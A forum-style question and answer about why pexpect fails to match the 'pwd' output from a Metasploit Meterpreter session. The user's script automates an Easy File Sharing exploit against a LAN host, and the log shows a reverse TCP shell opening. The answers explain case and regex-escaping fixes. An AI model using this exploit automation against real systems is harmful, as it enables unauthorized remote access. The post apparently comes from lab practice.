Why can't pexpect read this line?

Posted 2025-01-12 01:22:50 · 2185 characters · 0 views · 0 comments

I am trying to execute a pwd command on my metasploit session, then using pexpect, check if the correct result was returned.

Here is my function

import sys
import time

import pexpect


def executeEasyFileSharing(target):
    print("Executing: "+"msfconsole -q -x 'use exploit/windows/http/easyfilesharing_post ;set rhosts "+target[1]+";run")
    print("About to metasploit")
    #Create logfile
    fout = open('mylog.txt', 'wb')

    child = pexpect.spawn("msfconsole -q -x "+ str('"use exploit/windows/http/easyfilesharing_post ;set rhosts '+target[1] +';run"'), encoding='utf-8')
    child.logfile = sys.stdout

    print(child.expect_exact("Meterpreter session 1 opened", timeout=300))
    time.sleep(10)
    child.sendline("pwd")
    child.expect("C:\WINDOWS\System32",timeout=50)
    print("Success")

executeEasyFileSharing(["buffer","192.168.1.86"])

Here is the console output seen when run:

─$ python3 execution.py                                                  130 ⨯
Executing: msfconsole -q -x 'use exploit/windows/http/easyfilesharing_post ;set rhosts 192.168.1.86;run'
About to metasploit
[] No payload configured, defaulting to windows/meterpreter/reverse_tcp
rhosts => 192.168.1.86
[] Started reverse TCP handler on 192.168.1.102:4444 
[] Sending stage (175174 bytes) to 192.168.1.86
[] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.86:59854 ) at 2022-03-05 13:41:46 +0000
0
pwd

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > Traceback (most recent call last):
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 50, in <module>
    executeEasyFileSharing(["buffer","192.168.1.86"])
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 47, in executeEasyFileSharing
    child.expect("C:\WINDOWS\System32",timeout=50)
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 343, in expect
    return self.expect_list(compiled_pattern_list,
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 372, in expect_list
    return exp.expect_loop(timeout)
  File "/usr/lib/python3/dist-packages/pexpect/expect.py", line 181, in expect_loop
    return self.timeout(e)

The expected output should be that the function executes and Success is printed. pwd's result is clearly shown, so why isn't pexpect detecting it?

Comments (1)

提笔落墨 2025-01-19 01:22:50

You expect System32 with an upper-case S but it sends system32 with a lower-case s, and this is the problem.

This should work

# raw string with escaped backslashes, so the regex matches a literal "\"
child.expect(r"C:\\WINDOWS\\system32", timeout=50)

Eventually you can use (?i) to make the check case-insensitive

child.expect(r"(?i)C:\\WINDOWS\\System32", timeout=50)

Another question on Stack Overflow: What does (?i) mean in a Python/pexpect regex?
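
An added example, not part of the original question or answer: pexpect compiles a string given to expect() as a regular expression, so the backslashes in a Windows path matter as well as the letter case. The helper names and the sample output below are constructed for illustration; only the standard re module is used, mimicking expect()'s re.compile(pattern, re.DOTALL).

```python
import re

# Constructed sample of the text the child emits after "pwd"
# (typed here for illustration, not captured from a real session).
SAMPLE_OUTPUT = "pwd\r\n\r\nmeterpreter > pwd\r\nC:\\WINDOWS\\system32\r\nmeterpreter > "


def path_pattern(path, ignore_case=False):
    # Hypothetical helper: compile a regex that matches `path` literally.
    # re.escape stops sequences such as \W, \S and \s from being read as
    # regex character classes instead of a backslash plus a letter.
    flags = re.DOTALL | (re.IGNORECASE if ignore_case else 0)
    return re.compile(re.escape(path), flags)


def matches(pattern, output=SAMPLE_OUTPUT):
    # Mimic expect(): a str pattern is compiled with re.DOTALL and searched
    # for anywhere in the buffered output.
    if isinstance(pattern, str):
        pattern = re.compile(pattern, re.DOTALL)
    return pattern.search(output) is not None


def demo():
    return {
        # Unescaped path, wrong case: \W and \S act as character classes.
        "unescaped_wrong_case": matches(r"C:\WINDOWS\System32"),
        # Unescaped path, right case: still fails, \W eats the backslash
        # and the regex then wants "INDOWS" where the output has "WINDOWS".
        "unescaped_right_case": matches(r"C:\WINDOWS\system32"),
        # (?i) changes letter case handling only, not the \W and \S classes.
        "unescaped_ignore_case": matches(r"(?i)C:\WINDOWS\System32"),
        # Escaped, case-sensitive, wrong case: literal match fails on "S".
        "escaped_wrong_case": matches(path_pattern(r"C:\WINDOWS\System32")),
        # Escaped with the case the target actually prints.
        "escaped_right_case": matches(path_pattern(r"C:\WINDOWS\system32")),
        # Escaped and case-insensitive: tolerant of System32 vs system32.
        "escaped_ignore_case": matches(
            path_pattern(r"C:\WINDOWS\System32", ignore_case=True)),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:24} {'match' if ok else 'no match'}")
```

A compiled pattern from path_pattern() can be passed directly to child.expect(); child.expect_exact() is the alternative when a plain, case-sensitive substring match is enough.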
